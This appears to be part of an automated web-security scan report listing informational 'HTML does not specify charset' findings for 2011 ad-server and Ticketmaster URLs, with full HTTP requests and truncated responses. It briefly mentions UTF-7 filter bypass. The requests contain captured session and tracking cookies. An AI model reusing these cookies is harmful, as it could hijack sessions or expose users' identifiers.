<html lang="en-US"><head><meta name="ms.gsfxversion" content="7.6.9.0" /><meta name="ms.sup_cid" content="oas" /><meta name="ms.sup_cln" content="en-us" /><meta name="ms.sup_ct" content="dm" /><meta n
...[SNIP]...

28. HTML does not specify charset  previous  next
There are 26 instances of this issue:

Issue description

If a web response states that it contains HTML content but does not specify a character set, then the browser may analyse the HTML and attempt to determine which character set it appears to be using. Even if the majority of the HTML actually employs a standard character set such as UTF-8, the presence of non-standard characters anywhere in the response may cause the browser to interpret the content using a different character set. This can have unexpected results, and can lead to cross-site scripting vulnerabilities in which non-standard encodings like UTF-7 can be used to bypass the application's defensive filters.

In most cases, the absence of a charset directive does not constitute a security flaw, particularly if the response contains static content. You should review the contents of the response and the context in which it appears to determine whether any vulnerability exists.

Issue remediation

For every response containing HTML content, the application should include within the Content-type header a directive specifying a standard recognised character set, for example charset=ISO-8859-1.


28.1. http://ad.doubleclick.net/adi/N1558.NetMining/B5146585.127  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adi/N1558.NetMining/B5146585.127

Request

GET /adi/N1558.NetMining/B5146585.127;sz=728x90;pc=%5BTPAS_ID%5D;ord=1311108175;click=http://ads.undertone.com/c?oaparams=2__bannerid=174266__campaignid=28159__zoneid=16565__UTLCA=1__ptm=1671__cb=94bf6c6737ee486194ee917598e78a1c__bk=lolljh__id=2vaimk2c7zwrks2trxj9vaxbr__oadest=;? HTTP/1.1
Host: ad.doubleclick.net
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://a.netmng.com/hic/?nm_width=728&nm_height=90&nm_publ=201&nm_c=250&beacon=November2010&url=Undertone&passback&click=http://ads.undertone.com/c?oaparams=2__bannerid=174266__campaignid=28159__zoneid=16565__UTLCA=1__ptm=1671__cb=94bf6c6737ee486194ee917598e78a1c__bk=lolljh__id=2vaimk2c7zwrks2trxj9vaxbr__oadest=
Cookie: id=2253b03f0e0100a7|1365243/25505/15169|t=1308836888|et=730|cs=002213fd481abe33e2cc59585e

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: text/html
Content-Length: 7171
Cache-Control: no-cache
Pragma: no-cache
Date: Tue, 19 Jul 2011 20:43:01 GMT
Expires: Tue, 19 Jul 2011 20:43:01 GMT
Discarded: true

<html><head><title>Advertisement</title></head><body bgcolor=#ffffff marginwidth=0 marginheight=0 leftmargin=0 topmargin=0><!-- Copyright 2008 DoubleClick, a division of Google Inc. All rights reserve
...[SNIP]...

28.2. http://ads.as4x.tmcs.ticketmaster.com/html.ng/site=tm&pagepos=990&adsize=1x1&brand=0&event_name='U2%20360%BA%20Tour'&venue_name='New%20Meadowlands%20Stadium'&eventid=000043582C516D43&page=event&majorcatid=10001&minorcatid=1&dmaid=324&venuezip=07073&venueid=1233&artistid=1308249&secondaryid=836507&promoter=653&pagename=edp&bgcolor=ffffff&artist1_name=u2&cceclassid=0&lang=en-us&event_date='07/20/2011'&event_time_zone='America/New_York'&event_time='07:00%20PM'&event_day='Wed'&true_ref=http%253A%252F%252Fbing.fansnap.com%252Fu2-tickets%252Fu2-with-interpol-rescheduled-from-719%252Fjuly-20-2011-389669%253Futm_source%253D1987%2526ack%253Dhttp%25253a%25252f%25252fwww.bing.com%25252fs%25252fack.html  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ads.as4x.tmcs.ticketmaster.com
Path:   /html.ng/site=tm&pagepos=990&adsize=1x1&brand=0&event_name='U2%20360%BA%20Tour'&venue_name='New%20Meadowlands%20Stadium'&eventid=000043582C516D43&page=event&majorcatid=10001&minorcatid=1&dmaid=324&venuezip=07073&venueid=1233&artistid=1308249&secondaryid=836507&promoter=653&pagename=edp&bgcolor=ffffff&artist1_name=u2&cceclassid=0&lang=en-us&event_date='07/20/2011'&event_time_zone='America/New_York'&event_time='07:00%20PM'&event_day='Wed'&true_ref=http%253A%252F%252Fbing.fansnap.com%252Fu2-tickets%252Fu2-with-interpol-rescheduled-from-719%252Fjuly-20-2011-389669%253Futm_source%253D1987%2526ack%253Dhttp%25253a%25252f%25252fwww.bing.com%25252fs%25252fack.html

Request

GET /html.ng/site=tm&pagepos=990&adsize=1x1&brand=0&event_name='U2%20360%BA%20Tour'&venue_name='New%20Meadowlands%20Stadium'&eventid=000043582C516D43&page=event&majorcatid=10001&minorcatid=1&dmaid=324&venuezip=07073&venueid=1233&artistid=1308249&secondaryid=836507&promoter=653&pagename=edp&bgcolor=ffffff&artist1_name=u2&cceclassid=0&lang=en-us&event_date='07/20/2011'&event_time_zone='America/New_York'&event_time='07:00%20PM'&event_day='Wed'&true_ref=http%253A%252F%252Fbing.fansnap.com%252Fu2-tickets%252Fu2-with-interpol-rescheduled-from-719%252Fjuly-20-2011-389669%253Futm_source%253D1987%2526ack%253Dhttp%25253a%25252f%25252fwww.bing.com%25252fs%25252fack.html HTTP/1.1
Host: ads.as4x.tmcs.ticketmaster.com
Proxy-Connection: keep-alive
Referer: http://www.ticketmaster.com/event/000043582C516D43?artistid=736365&majorcatid=10001&minorcatid=1
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.30 (KHTML, like Gecko) Chrome/12.0.742.122 Safari/534.30
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: GEORAN=1; SID=Y3dq6VJOUobgvd5jFa2adifFsjQPEDu1SwQqHaI3I3ywZ2h_RqrBBbchAambLEYToFNp0jdvZxmi9vEG; BID=MN5k2Ii01e9c8eT9zIsTZrTP8tnmzVQDkHCqfm3pQgSOOVA96YtvgyxM-HQGO_XI68l_ZoGoHFIlKwiEeN9v; NPDMA=238; NGUserID=a4b2480-32187-970230788-20; __cs_rr=1; GEO_OMN=ba; NDMA=238; LANGUAGE=en-us; foresee.alive=1311100561797; s_pers=%20gpv1%3DTM_US%253A%2520EDP%253A%2520Box%2520Classic%253A%2520On%2520Sale%7C1311102362932%3B%20s_vs%3D1%7C1311102362935%3B%20gpv%3DTM_US%253A%2520EDP%253A%2520Box%2520Classic%253A%2520On%2520Sale%7C1311102362989%3B%20s_vnum%3D1313692562997%2526vn%253D1%7C1313692562997%3B%20s_invisit%3Dtrue%7C1311102362997%3B; s_sess=%20cpcbrate%3D1%3B%20currentEventList%3D%253B000043582C516D43%3B%20s_cc%3Dtrue%3B%20s_ria%3Dflash%252010%257C%3B%20s_sq%3D%3B

Response

HTTP/1.1 200 OK
Date: Tue, 19 Jul 2011 18:36:29 GMT
Server: Apache
AdServer: svr2.ads.ash3.clisys.tmcs:9691:1
P3P: policyref="http://ads.as4x.tmcs.net/w3c/p3p.xml", CP="NOI DSP LAW NID PSA ADM OUR IND NAV COM", policyref="http://ads.as4x.tmcs.net/w3c/p3p.xml", CP="NOI DSP LAW NID PSA ADM OUR IND NAV COM"
Pragma: no-cache
Content-Length: 1644
Connection: close
Content-Type: text/html

<html><head></head><body>
<script type="text/javascript">
<!--
function create_zap_iframe() {

var zap_url='//b3.mookie1.com/2/ticketmaster/ZAP/1@x01?';
var frame=document.createElement('iframe');
fra
...[SNIP]...

28.3. http://asset0.zendesk.com/external/zenbox/v2.1/loading.html  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://asset0.zendesk.com
Path:   /external/zenbox/v2.1/loading.html

Request

GET /external/zenbox/v2.1/loading.html HTTP/1.1
Host: asset0.zendesk.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.mavitunasecurity.com/

Response

HTTP/1.1 200 OK
Server: nginx/0.8.53
Date: Tue, 19 Jul 2011 15:38:25 GMT
Content-Type: text/html
Last-Modified: Mon, 23 May 2011 20:57:52 GMT
Connection: keep-alive
Content-Length: 631

<!DOCTYPE html>
<html lang='en-US'>
<head>
<title>Zendesk Dropbox Loading...</title>
<meta charset="UTF-8">
<style>
body {
margin: 0;
padding: 0;
}
.wra
...[SNIP]...

28.4. http://b3.mookie1.com/2/TRACK_Ticketmaster/LN/RTG_SX_NonSecure@Bottom3  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://b3.mookie1.com
Path:   /2/TRACK_Ticketmaster/LN/RTG_SX_NonSecure@Bottom3

Request

GET /2/TRACK_Ticketmaster/LN/RTG_SX_NonSecure@Bottom3 HTTP/1.1
Host: b3.mookie1.com
Proxy-Connection: keep-alive
Referer: http://b3.mookie1.com/2/ticketmaster/ZAP/1@x01?&_RM_HTML_artist1_name_=u2&_RM_HTML_event_name_=U2%20360%BA%20Tour&_RM_HTML_event_date_=07%2F20%2F2011&_RM_HTML_event_time_zone_=America%2FNew_York&_RM_HTML_event_time_=07:00%20PM&_RM_HTML_event_day_=Wed&_RM_HTML_venue_name_=New%20Meadowlands%20Stadium&_RM_HTML_venuezip_=07073&_RM_HTML_tixp_=&_RM_HTML_fvalue_=&_RM_HTML_confcode_=&_RM_HTML_pdate_=&_RM_HTML_ptime_=&_RM_HTML_pday_=&_RM_HTML_bstate_=&_RM_HTML_bzip_=&_RM_HTML_country_=&_RM_HTML_eventid_=000043582C516D43&_RM_HTML_venueid_=1233&_RM_HTML_artistid_=1308249&_RM_HTML_majorcatid_=10001&_RM_HTML_minorcatid_=1&_RM_HTML_referer=http%253A%252F%252Fwww.ticketmaster.com%252Fevent%252F000043582C516D43%253Fartistid%253D736365%2526majorcatid%253D10001%2526minorcatid%253D1
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.30 (KHTML, like Gecko) Chrome/12.0.742.122 Safari/534.30
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: OAX=rcHW803OVbgACmEf; RMFL=011QNP3MU107OK; RMFM=011QbQnIJ10I1k|U10JLQ|M10TqE; NXCLICK2=011QbQnINX_NonSecure!y!B3!gA!14lNX_TRACK_Xerox/XLS2011/ZAPTraderBluekaiBusinessDecisionMakerData_NX_NonSecure!y!B3!JLQ!Hfk; id=2814750682866683; NSC_o4efm_qppm_iuuq=ffffffff09419e2b45525d5f4f58455e445a4a423660; ticketmaster=true

Response

HTTP/1.1 200 OK
Date: Tue, 19 Jul 2011 18:36:43 GMT
Server: Apache/2.2.3 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Content-Length: 319
Content-Type: text/html

<A HREF="http://b3.mookie1.com/RealMedia/ads/click_lx.ads/TRACK_Ticketmaster/LN/RTG_SX_NonSecure/1636527550/Bottom3/default/empty.gif/726348573830334f56626741436d4566?x" target="_top"><IMG SRC="http:/
...[SNIP]...

28.5. http://b3.mookie1.com/2/ticketmaster/172548/11408426983@x01  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://b3.mookie1.com
Path:   /2/ticketmaster/172548/11408426983@x01

Request

GET /2/ticketmaster/172548/11408426983@x01? HTTP/1.1
Host: b3.mookie1.com
Proxy-Connection: keep-alive
Referer: http://b3.mookie1.com/2/ticketmaster/ZAP/1@x01?&_RM_HTML_artist1_name_=u2&_RM_HTML_event_name_=U2%20360%BA%20Tour&_RM_HTML_event_date_=07%2F20%2F2011&_RM_HTML_event_time_zone_=America%2FNew_York&_RM_HTML_event_time_=07:00%20PM&_RM_HTML_event_day_=Wed&_RM_HTML_venue_name_=New%20Meadowlands%20Stadium&_RM_HTML_venuezip_=07073&_RM_HTML_tixp_=&_RM_HTML_fvalue_=&_RM_HTML_confcode_=&_RM_HTML_pdate_=&_RM_HTML_ptime_=&_RM_HTML_pday_=&_RM_HTML_bstate_=&_RM_HTML_bzip_=&_RM_HTML_country_=&_RM_HTML_eventid_=000043582C516D43&_RM_HTML_venueid_=1233&_RM_HTML_artistid_=1308249&_RM_HTML_majorcatid_=10001&_RM_HTML_minorcatid_=1&_RM_HTML_referer=http%253A%252F%252Fwww.ticketmaster.com%252Fevent%252F000043582C516D43%253Fartistid%253D736365%2526majorcatid%253D10001%2526minorcatid%253D1
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.30 (KHTML, like Gecko) Chrome/12.0.742.122 Safari/534.30
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: OAX=rcHW803OVbgACmEf; RMFL=011QNP3MU107OK; RMFM=011QbQnIJ10I1k|U10JLQ|M10TqE; NXCLICK2=011QbQnINX_NonSecure!y!B3!gA!14lNX_TRACK_Xerox/XLS2011/ZAPTraderBluekaiBusinessDecisionMakerData_NX_NonSecure!y!B3!JLQ!Hfk; id=2814750682866683; NSC_o4efm_qppm_iuuq=ffffffff09419e2b45525d5f4f58455e445a4a423660; ticketmaster=true; artist=:1308249; venueid=:1233; minorcatid=:1

Response

HTTP/1.1 200 OK
Date: Tue, 19 Jul 2011 18:39:36 GMT
Server: Apache/2.2.3 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Content-Length: 354
Content-Type: text/html

<A HREF="http://b3.mookie1.com/RealMedia/ads/click_lx.ads/ticketmaster/172548/L19/48186436/x01/USNetwork/Ticketmaster_DumpCampaign/1x1Pixel.gif/726348573830334f56626741436d4566?x" target="_blank"><IMG
...[SNIP]...

28.6. http://b3.mookie1.com/2/ticketmaster/AirCanadaCentre/11408426983@x01  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://b3.mookie1.com
Path:   /2/ticketmaster/AirCanadaCentre/11408426983@x01

Request

GET /2/ticketmaster/AirCanadaCentre/11408426983@x01? HTTP/1.1
Host: b3.mookie1.com
Proxy-Connection: keep-alive
Referer: http://b3.mookie1.com/2/ticketmaster/ZAP/1@x01?&_RM_HTML_artist1_name_=u2&_RM_HTML_event_name_=U2%20360%BA%20Tour&_RM_HTML_event_date_=07%2F20%2F2011&_RM_HTML_event_time_zone_=America%2FNew_York&_RM_HTML_event_time_=07:00%20PM&_RM_HTML_event_day_=Wed&_RM_HTML_venue_name_=New%20Meadowlands%20Stadium&_RM_HTML_venuezip_=07073&_RM_HTML_tixp_=&_RM_HTML_fvalue_=&_RM_HTML_confcode_=&_RM_HTML_pdate_=&_RM_HTML_ptime_=&_RM_HTML_pday_=&_RM_HTML_bstate_=&_RM_HTML_bzip_=&_RM_HTML_country_=&_RM_HTML_eventid_=000043582C516D43&_RM_HTML_venueid_=1233&_RM_HTML_artistid_=1308249&_RM_HTML_majorcatid_=10001&_RM_HTML_minorcatid_=1&_RM_HTML_referer=http%253A%252F%252Fwww.ticketmaster.com%252Fevent%252F000043582C516D43%253Fartistid%253D736365%2526majorcatid%253D10001%2526minorcatid%253D1
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.30 (KHTML, like Gecko) Chrome/12.0.742.122 Safari/534.30
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: OAX=rcHW803OVbgACmEf; RMFL=011QNP3MU107OK; RMFM=011QbQnIJ10I1k|U10JLQ|M10TqE; NXCLICK2=011QbQnINX_NonSecure!y!B3!gA!14lNX_TRACK_Xerox/XLS2011/ZAPTraderBluekaiBusinessDecisionMakerData_NX_NonSecure!y!B3!JLQ!Hfk; id=2814750682866683; NSC_o4efm_qppm_iuuq=ffffffff09419e2b45525d5f4f58455e445a4a423660; ticketmaster=true; artist=:1308249; venueid=:1233; minorcatid=:1

Response

HTTP/1.1 200 OK
Date: Tue, 19 Jul 2011 18:39:33 GMT
Server: Apache/2.2.3 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Content-Length: 362
Content-Type: text/html

<A HREF="http://b3.mookie1.com/RealMedia/ads/click_lx.ads/ticketmaster/AirCanadaCentre/L28/9647235/x01/USNetwork/Ticketmaster_DumpCampaign/1x1Pixel.gif/726348573830334f56626741436d4566?x" target="_bla
...[SNIP]...

28.7. http://b3.mookie1.com/2/ticketmaster/ZAP/1@x01  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://b3.mookie1.com
Path:   /2/ticketmaster/ZAP/1@x01

Request

GET /2/ticketmaster/ZAP/1@x01?&_RM_HTML_artist1_name_=u2&_RM_HTML_event_name_=U2%20360%BA%20Tour&_RM_HTML_event_date_=07%2F20%2F2011&_RM_HTML_event_time_zone_=America%2FNew_York&_RM_HTML_event_time_=07:00%20PM&_RM_HTML_event_day_=Wed&_RM_HTML_venue_name_=New%20Meadowlands%20Stadium&_RM_HTML_venuezip_=07073&_RM_HTML_tixp_=&_RM_HTML_fvalue_=&_RM_HTML_confcode_=&_RM_HTML_pdate_=&_RM_HTML_ptime_=&_RM_HTML_pday_=&_RM_HTML_bstate_=&_RM_HTML_bzip_=&_RM_HTML_country_=&_RM_HTML_eventid_=000043582C516D43&_RM_HTML_venueid_=1233&_RM_HTML_artistid_=1308249&_RM_HTML_majorcatid_=10001&_RM_HTML_minorcatid_=1&_RM_HTML_referer=http%253A%252F%252Fwww.ticketmaster.com%252Fevent%252F000043582C516D43%253Fartistid%253D736365%2526majorcatid%253D10001%2526minorcatid%253D1 HTTP/1.1
Host: b3.mookie1.com
Proxy-Connection: keep-alive
Referer: http://ads.as4x.tmcs.ticketmaster.com/html.ng/site=tm&pagepos=990&adsize=1x1&brand=0&event_name='U2%20360%BA%20Tour'&venue_name='New%20Meadowlands%20Stadium'&eventid=000043582C516D43&page=event&majorcatid=10001&minorcatid=1&dmaid=324&venuezip=07073&venueid=1233&artistid=1308249&secondaryid=836507&promoter=653&pagename=edp&bgcolor=ffffff&artist1_name=u2&cceclassid=0&lang=en-us&event_date='07/20/2011'&event_time_zone='America/New_York'&event_time='07:00%20PM'&event_day='Wed'&true_ref=http%253A%252F%252Fbing.fansnap.com%252Fu2-tickets%252Fu2-with-interpol-rescheduled-from-719%252Fjuly-20-2011-389669%253Futm_source%253D1987%2526ack%253Dhttp%25253a%25252f%25252fwww.bing.com%25252fs%25252fack.html
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.30 (KHTML, like Gecko) Chrome/12.0.742.122 Safari/534.30
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: OAX=rcHW803OVbgACmEf; RMFL=011QNP3MU107OK; RMFM=011QbQnIJ10I1k|U10JLQ|M10TqE; NXCLICK2=011QbQnINX_NonSecure!y!B3!gA!14lNX_TRACK_Xerox/XLS2011/ZAPTraderBluekaiBusinessDecisionMakerData_NX_NonSecure!y!B3!JLQ!Hfk; id=2814750682866683

Response

HTTP/1.1 200 OK
Date: Tue, 19 Jul 2011 18:39:42 GMT
Server: Apache/2.2.3 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Content-Length: 38382
Content-Type: text/html

<script>
function cookie_check(ifd,ife){ var s=ife.indexOf(ifd); if(s==-1)return ""; s+=ifd.length; var e=ife.indexOf(";",s); if(e==-1)e=ife.length; return ife.substring(s,e); }

var artist1_name='
...[SNIP]...

28.8. http://b3.mookie1.com/2/ticketmaster/minorcat/1/11408426983@x02  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://b3.mookie1.com
Path:   /2/ticketmaster/minorcat/1/11408426983@x02

Request

GET /2/ticketmaster/minorcat/1/11408426983@x02? HTTP/1.1
Host: b3.mookie1.com
Proxy-Connection: keep-alive
Referer: http://b3.mookie1.com/2/ticketmaster/ZAP/1@x01?&_RM_HTML_artist1_name_=u2&_RM_HTML_event_name_=U2%20360%BA%20Tour&_RM_HTML_event_date_=07%2F20%2F2011&_RM_HTML_event_time_zone_=America%2FNew_York&_RM_HTML_event_time_=07:00%20PM&_RM_HTML_event_day_=Wed&_RM_HTML_venue_name_=New%20Meadowlands%20Stadium&_RM_HTML_venuezip_=07073&_RM_HTML_tixp_=&_RM_HTML_fvalue_=&_RM_HTML_confcode_=&_RM_HTML_pdate_=&_RM_HTML_ptime_=&_RM_HTML_pday_=&_RM_HTML_bstate_=&_RM_HTML_bzip_=&_RM_HTML_country_=&_RM_HTML_eventid_=000043582C516D43&_RM_HTML_venueid_=1233&_RM_HTML_artistid_=1308249&_RM_HTML_majorcatid_=10001&_RM_HTML_minorcatid_=1&_RM_HTML_referer=http%253A%252F%252Fwww.ticketmaster.com%252Fevent%252F000043582C516D43%253Fartistid%253D736365%2526majorcatid%253D10001%2526minorcatid%253D1
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.30 (KHTML, like Gecko) Chrome/12.0.742.122 Safari/534.30
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: OAX=rcHW803OVbgACmEf; RMFL=011QNP3MU107OK; RMFM=011QbQnIJ10I1k|U10JLQ|M10TqE; NXCLICK2=011QbQnINX_NonSecure!y!B3!gA!14lNX_TRACK_Xerox/XLS2011/ZAPTraderBluekaiBusinessDecisionMakerData_NX_NonSecure!y!B3!JLQ!Hfk; id=2814750682866683; NSC_o4efm_qppm_iuuq=ffffffff09419e2b45525d5f4f58455e445a4a423660; ticketmaster=true; artist=:1308249; venueid=:1233; minorcatid=:1

Response

HTTP/1.1 200 OK
Date: Tue, 19 Jul 2011 18:36:05 GMT
Server: Apache/2.2.3 (Red Hat)
Set-Cookie: RMFM=011QjF9J810JLQ|U10MCo|U10QMP|010TqE; expires=Fri, 19-Jul-13 18:36:05 GMT; path=/; domain=.mookie1.com
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Content-Length: 9
Content-Type: text/html

<!-- -->

28.9. http://b3.mookie1.com/2/zzzSample/wwww.themig.com/1627503762@x96  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://b3.mookie1.com
Path:   /2/zzzSample/wwww.themig.com/1627503762@x96

Request

GET /2/zzzSample/wwww.themig.com/1627503762@x96?&XE&Page=HomeMedia%20Innovation%20Group%20-%20Contact%20Us&tax23_RefDocLoc=http://www.fakereferrerdominator.com/referrerPathName&if_nt_CookieAccept=Y&XE HTTP/1.1
Host: b3.mookie1.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.mookie1.com/contact.php
Cookie: OAX=rcHW801Sn9AACaXG; id=633324155481331; NSC_o4efm_qppm_iuuq=ffffffff09419e3e45525d5f4f58455e445a4a423660; s_cc=true; s_sq=%5B%5BB%5D%5D; session=1311100939|1311100939

Response

HTTP/1.1 200 OK
Date: Tue, 19 Jul 2011 18:42:48 GMT
Server: Apache/2.2.3 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Content-Length: 13
Content-Type: text/html

<!-- DATA -->

28.10. http://b3.mookie1.com/2/zzzSample/wwww.themig.com/1936689153@x96  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://b3.mookie1.com
Path:   /2/zzzSample/wwww.themig.com/1936689153@x96

Request

GET /2/zzzSample/wwww.themig.com/1936689153@x96?&XE&Page=HomeMedia%20Innovation%20Group%20-%20Home&tax23_RefDocLoc=http://www.fakereferrerdominator.com/referrerPathName&if_nt_CookieAccept=Y&XE HTTP/1.1
Host: b3.mookie1.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.mookie1.com/home.php
Cookie: OAX=rcHW801Sn9AACaXG; id=633324155481331; NSC_o4efm_qppm_iuuq=ffffffff09419e3e45525d5f4f58455e445a4a423660; s_cc=true; s_sq=%5B%5BB%5D%5D

Response

HTTP/1.1 200 OK
Date: Tue, 19 Jul 2011 18:42:20 GMT
Server: Apache/2.2.3 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Content-Length: 13
Content-Type: text/html

<!-- DATA -->

28.11. http://b3.mookie1.com/2/zzzSample/wwww.themig.com/1@x96  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://b3.mookie1.com
Path:   /2/zzzSample/wwww.themig.com/1@x96

Request

GET /2/zzzSample/wwww.themig.com/1@x96?&XE&Site=TheMig.com&Section=we&XE HTTP/1.1
Host: b3.mookie1.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.mookie1.com/home.php
Cookie: OAX=rcHW801Sn9AACaXG; id=633324155481331; NSC_o4efm_qppm_iuuq=ffffffff09419e3e45525d5f4f58455e445a4a423660

Response

HTTP/1.1 200 OK
Date: Tue, 19 Jul 2011 18:42:20 GMT
Server: Apache/2.2.3 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Content-Length: 13
Content-Type: text/html

<!-- DATA -->

28.12. http://corporate.everydayhealth.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://corporate.everydayhealth.com
Path:   /favicon.ico

Request

GET /favicon.ico HTTP/1.1
Host: corporate.everydayhealth.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Cookie: SL_Audience=210|Accelerated|203|1|0; __utmz=104244948.1305642699.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/30; s_vi=[CS]v1|26E943688507A615-6000010160003977[CE]; .ASPXANONYMOUS=Acx84xcyPgZjNzU4YjAwZS05NzBkLTQ1MTctYWIyNy03MWNiM2NhYTlmM2I1; __utma=104244948.1964776954.1305642699.1305642699.1305642699.1

Response

HTTP/1.1 404 Not Found
Content-Length: 103
Content-Type: text/html
Server: Microsoft-IIS/6.0
Server-ID: : USNJWWEB02
X-Powered-By: ASP.NET
Date: Tue, 19 Jul 2011 20:20:13 GMT

<html><head><title>Error</title></head><body>The system cannot find the file specified.
</body></html>

28.13. http://creatives.as4x.tmcs.net/tmsandbox3a.html  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://creatives.as4x.tmcs.net
Path:   /tmsandbox3a.html

Request

GET /tmsandbox3a.html?site=tm&adsize=176x200&handle=N&pagepos=580&page=event&majorcatid=10001&minorcatid=1&dmaid=324&venuezip=07073&venueid=1233&artistid=1308249&secondaryid=836507&promoter=653&bgcolor=ffffff&artist1_name=u2&cceclassid=0&lang=en-us&brand=0&eventid=000043582C516D43 HTTP/1.1
Host: creatives.as4x.tmcs.net
Proxy-Connection: keep-alive
Referer: http://www.ticketmaster.com/event/000043582C516D43?artistid=736365&majorcatid=10001&minorcatid=1
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.30 (KHTML, like Gecko) Chrome/12.0.742.122 Safari/534.30
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Server: Apache
Accept-Ranges: bytes
P3P: policyref="http://ads.as4x.tmcs.net/w3c/p3p.xml", CP="NOI DSP LAW NID PSA ADM OUR IND NAV COM"
Content-Type: text/html
